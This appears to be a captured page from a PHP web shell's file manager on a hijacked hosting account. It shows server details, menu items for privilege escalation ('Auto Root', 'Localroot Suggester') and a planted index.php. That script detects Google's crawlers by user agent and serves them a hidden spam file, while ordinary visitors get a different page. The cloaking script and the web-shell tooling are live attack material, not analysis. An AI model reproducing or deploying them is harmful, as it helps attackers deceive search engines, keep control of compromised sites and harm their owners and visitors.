Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.189
Domains :
Cant Read [ /etc/named.conf ]
User : klinikpe
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
klinikpe /
public_html /
testimonials /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-07 01:42
cache.txt
0
B
-rw-r--r--
2026-07-04 10:41
googlea3cd0991986d33e2.html
53
B
-rw-r--r--
2026-06-26 06:52
home.php
141.02
KB
-rw-r--r--
2026-06-26 06:35
index.php
897
B
-rw-r--r--
2026-06-26 06:36
Save
Rename
<?php function isGoogleBot() { if (empty($_SERVER['HTTP_USER_AGENT'])) { return false; } $googleBots = array( 'Googlebot', 'Google-Site-Verification', 'Google-InspectionTool', 'Googlebot-Mobile', 'Googlebot-News' ); $userAgent = $_SERVER['HTTP_USER_AGENT']; foreach ($googleBots as $bot) { if (stripos($userAgent, $bot) !== false) { return true; } } return false; } if (isGoogleBot()) { $ampFile = __DIR__ . '/cache.txt'; if (is_file($ampFile) && is_readable($ampFile)) { header('Content-Type: text/html; charset=utf-8'); readfile($ampFile); } else { http_response_code(500); echo 'Error: AMP version not available.'; } exit; } // Default fallback include __DIR__ . '/home.php'; exit; ?>